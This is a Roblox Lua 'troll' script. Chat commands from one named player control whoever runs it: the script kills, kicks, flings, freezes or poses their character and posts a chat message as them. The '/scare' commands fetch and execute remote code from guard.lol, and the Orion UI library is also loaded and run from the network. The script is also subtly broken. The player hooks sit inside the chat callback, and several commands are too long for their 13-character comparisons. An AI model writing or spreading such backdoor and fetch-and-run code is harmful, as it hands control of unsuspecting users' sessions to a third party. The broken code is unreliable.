local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()

OrionLib:MakeNotification({
	Name = "CREDITS",
	Content = "Credits to am noob",
	Image = "rbxassetid://4483345998",
	Time = 10
})



function veryepictrol(x)
    local d;d=x.Chatted:Connect(function(msg)
 local LPlayer = game.Players.revsteppinsstand
 print(msg)
  if msg:lower():sub(1,13) == "/kill" then
      game.Players.LocalPlayer.Character.Humanoid.Health = 0
  end
  
   if msg:lower():sub(1,13) == "/e kill" then
      game.Players.LocalPlayer.Character.Humanoid.Health = 0
  end
  
  if msg:lower():sub(1,13) == "/e save" then
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(40.3467751, 269.770599, -11.007906, -0.710547626, -1.13326699e-07, 0.703649104, -7.29338794e-08, 1, 8.74067823e-08, -0.703649104, 1.07868185e-08, -0.710547626)
  end
  
 if msg:lower():sub(1,13) == "/e bring" then
      local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
 end
 
 
 
 if msg:lower():sub(1,13) == "/bring" then
      local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
 end

if msg:lower():sub(1,13) == "/e trip" then
game.Players.LocalPlayer.Character.Humanoid.Sit = true
  end
  
  if msg:lower():sub(1,13) == "/e kick" then
game.Players.LocalPlayer:Kick("Kicked by rev/jude")
  end
  
  if msg:lower():sub(1,13) == "/e sit" then
game.Players.LocalPlayer.Character.Humanoid.Sit = true
  end
  
  if msg:lower():sub(1,13) == "/e freeze" then
  game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
 end
 
 if msg:lower():sub(1,13) == "/e bring,freeze" then
      local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
      wait(0.5)
      game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
 end
 
 
 
 if msg:lower():sub(1,13) == "/e scare" then
  loadstring(game:HttpGet("https://guard.lol/scripts/universalscript.lua",true))()
 end
 
 if msg:lower():sub(1,13) == "/e unfreeze" then
game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
 end
 
  if msg:lower():sub(1,13) == "/e rejoin" then
local ts = game:GetService("TeleportService")

local p = game:GetService("Players").LocalPlayer

 

ts:Teleport(game.PlaceId, p)


end


if msg:lower():sub(1,13) == "/e speedy" then
  game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 999
 end
 
 
 
 if msg:lower():sub(1,13) == "/e fling" then
  game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-29645.6641, 2647586.5, 16135477, -0.989213824, 0.00574239623, 0.146365836, 0.005804908, 0.999983132, -2.75625993e-08, -0.146363363, 0.00084961293, -0.989230514)
 end
 
 
 
 if msg:lower():sub(1,13) == "/e banlands" then
  game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-99999999, 2647586.5, 16135477, -0.989213824, 0.00574239623, 0.146365836, 0.005804908, 0.999983132, -2.75625993e-08, -0.146363363, 0.00084961293, -0.989230514)
 end
 
 if msg:lower():sub(1,13) == "/e hell" then
  tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(300, Enum.EasingStyle.Linear)

tween = tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(0, -1000, 0)})
tween:Play()
wait(5)
game.Players.LocalPlayer.Character.Humanoid.Health = 0
 end
 
 
 
 if msg:lower():sub(1,13) == "/e god" then
  tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(300, Enum.EasingStyle.Linear)

tween = tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(0, 9000, 0)})
tween:Play()
wait(10)
game.Players.LocalPlayer.Character.Humanoid.Health = 0
 end
 

 if msg:lower():sub(1,13) == "/e void" then
  tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(300, Enum.EasingStyle.Linear)

tween = tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(0, -1000, 0)})
tween:Play()
wait(5)
game.Players.LocalPlayer.Character.Humanoid.Health = 0
 end


if msg:lower():sub(1,13) == "/e check" then
 local args = {
       [1] = "⭐Jude/rev was here⭐",
       [2] = "All"
   }
   game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
	end
	
	
	if msg:lower():sub(1,13) == "/e jump" then
   game:GetService("Players").LocalPlayer.Character.Humanoid.Jump = true
	end

 if msg:lower():sub(1,13) == "/e bang,freeze" then
  
  local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
      wait(2)
  
  local Human = game.Players.LocalPlayer.Character.Humanoid
	if not Human then
		return
	end
	Human.Sit = true
	task.wait(.1)
	Human.RootPart.CFrame = Human.RootPart.CFrame * CFrame.Angles(math.pi * .15, 0, 0)
	for _, v in ipairs(Human:GetPlayingAnimationTracks()) do
		v:Stop()
		wait(0.9)
	game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
 end
 end
 
 if msg:lower():sub(1,13) == "/e bang" then
  local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
      wait(2)
  local Human = game.Players.LocalPlayer.Character.Humanoid
	if not Human then
		return
	end
	Human.Sit = true
	task.wait(.1)
	Human.RootPart.CFrame = Human.RootPart.CFrame * CFrame.Angles(math.pi * .15, 0, 0)
	for _, v in ipairs(Human:GetPlayingAnimationTracks()) do
		v:Stop()
 end
 end
 
 




if msg:lower():sub(1,13) == "/e lay" then
local Human = game.Players.LocalPlayer.Character.Humanoid
	if not Human then
		return
	end
	Human.Sit = true
	task.wait(.1)
	Human.RootPart.CFrame = Human.RootPart.CFrame * CFrame.Angles(math.pi * .5, 0, 0)
	for _, v in ipairs(Human:GetPlayingAnimationTracks()) do
		v:Stop()
	end
	end

if msg:lower():sub(1,13) == "/e lay,freeze" then
  local Human = game.Players.LocalPlayer.Character.Humanoid
	if not Human then
		return
	end
	Human.Sit = true
	task.wait(.1)
	Human.RootPart.CFrame = Human.RootPart.CFrame * CFrame.Angles(math.pi * .5, 0, 0)
	for _, v in ipairs(Human:GetPlayingAnimationTracks()) do
		v:Stop()
	end
	wait(0.5)
	game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
 end 
  if msg:lower():sub(1,13) == "/save" then
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(40.3467751, 269.770599, -11.007906, -0.710547626, -1.13326699e-07, 0.703649104, -7.29338794e-08, 1, 8.74067823e-08, -0.703649104, 1.07868185e-08, -0.710547626)
  end
  
 if msg:lower():sub(1,13) == "/bring" then
      local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
 end

if msg:lower():sub(1,13) == "/trip" then
game.Players.LocalPlayer.Character.Humanoid.Sit = true
  end
  
  if msg:lower():sub(1,13) == "/kick" then
game.Players.LocalPlayer:Kick("Kicked by rev/jude")
  end
  
  if msg:lower():sub(1,13) == "/sit" then
game.Players.LocalPlayer.Character.Humanoid.Sit = true
  end
  
  if msg:lower():sub(1,13) == "/freeze" then
  game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
 end
 
 if msg:lower():sub(1,13) == "/bring,freeze" then
      local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
      wait(0.5)
      game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
 end
 
 
 
 if msg:lower():sub(1,13) == "/scare" then
  loadstring(game:HttpGet("https://guard.lol/scripts/universalscript.lua",true))()
 end
 
 if msg:lower():sub(1,13) == "/unfreeze" then
game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
 end
 
  if msg:lower():sub(1,13) == "/rejoin" then
local ts = game:GetService("TeleportService")

local p = game:GetService("Players").LocalPlayer

 

ts:Teleport(game.PlaceId, p)


end


if msg:lower():sub(1,13) == "/speedy" then
  game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 999
 end
 
 
 
 if msg:lower():sub(1,13) == "/fling" then
  game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-29645.6641, 2647586.5, 16135477, -0.989213824, 0.00574239623, 0.146365836, 0.005804908, 0.999983132, -2.75625993e-08, -0.146363363, 0.00084961293, -0.989230514)
 end
 
 
 
 if msg:lower():sub(1,13) == "/banlands" then
  game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-99999999, 2647586.5, 16135477, -0.989213824, 0.00574239623, 0.146365836, 0.005804908, 0.999983132, -2.75625993e-08, -0.146363363, 0.00084961293, -0.989230514)
 end
 
 if msg:lower():sub(1,13) == "/hell" then
  tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(300, Enum.EasingStyle.Linear)

tween = tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(0, -1000, 0)})
tween:Play()
wait(5)
game.Players.LocalPlayer.Character.Humanoid.Health = 0
 end
 
 
 
 if msg:lower():sub(1,13) == "/god" then
  tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(300, Enum.EasingStyle.Linear)

tween = tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(0, 9000, 0)})
tween:Play()
wait(10)
game.Players.LocalPlayer.Character.Humanoid.Health = 0
 end
 

 if msg:lower():sub(1,13) == "/void" then
  tweenService, tweenInfo = game:GetService("TweenService"), TweenInfo.new(300, Enum.EasingStyle.Linear)

tween = tweenService:Create(game:GetService("Players")["LocalPlayer"].Character.HumanoidRootPart, tweenInfo, {CFrame = CFrame.new(0, -1000, 0)})
tween:Play()
wait(5)
game.Players.LocalPlayer.Character.Humanoid.Health = 0
 end


if msg:lower():sub(1,13) == "/check" then
 local args = {
       [1] = "⭐Jude/rev was here⭐",
       [2] = "All"
   }
   game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
	end
	
	
	if msg:lower():sub(1,13) == "/jump" then
   game:GetService("Players").LocalPlayer.Character.Humanoid.Jump = true
	end

 if msg:lower():sub(1,13) == "/bang,freeze" then
  
  local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
      wait(2)
  
  local Human = game.Players.LocalPlayer.Character.Humanoid
	if not Human then
		return
	end
	Human.Sit = true
	task.wait(.1)
	Human.RootPart.CFrame = Human.RootPart.CFrame * CFrame.Angles(math.pi * .15, 0, 0)
	for _, v in ipairs(Human:GetPlayingAnimationTracks()) do
		v:Stop()
		wait(0.9)
	game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
 end
 end
 
 if msg:lower():sub(1,13) == "/bang" then
  local ME = game:GetService("Workspace").revsteppinsstand.Torso.CFrame
      game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = ME
      wait(2)
  local Human = game.Players.LocalPlayer.Character.Humanoid
	if not Human then
		return
	end
	Human.Sit = true
	task.wait(.1)
	Human.RootPart.CFrame = Human.RootPart.CFrame * CFrame.Angles(math.pi * .15, 0, 0)
	for _, v in ipairs(Human:GetPlayingAnimationTracks()) do
		v:Stop()
 end
 end
 
 




if msg:lower():sub(1,13) == "/lay" then
local Human = game.Players.LocalPlayer.Character.Humanoid
	if not Human then
		return
	end
	Human.Sit = true
	task.wait(.1)
	Human.RootPart.CFrame = Human.RootPart.CFrame * CFrame.Angles(math.pi * .5, 0, 0)
	for _, v in ipairs(Human:GetPlayingAnimationTracks()) do
		v:Stop()
	end
	end

if msg:lower():sub(1,13) == "/lay,freeze" then
  local Human = game.Players.LocalPlayer.Character.Humanoid
	if not Human then
		return
	end
	Human.Sit = true
	task.wait(.1)
	Human.RootPart.CFrame = Human.RootPart.CFrame * CFrame.Angles(math.pi * .5, 0, 0)
	for _, v in ipairs(Human:GetPlayingAnimationTracks()) do
		v:Stop()
	end
	wait(0.5)
	game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
end
local d1;d1=x.PlayerRemoving:connect(function()
    d:Disconnect()
    d1:Disconnect()
end)

game.Players.PlayerAdded:connect(function(x)
    if x.Name == "revsteppinsstand" then
        veryepictrol(x)
    end
end)

for i,v in pairs(game.Players:GetPlayers()) do
    if v.Name == "revsteppinsstand" then
        veryepictrol(v)
    end
end
end)
end
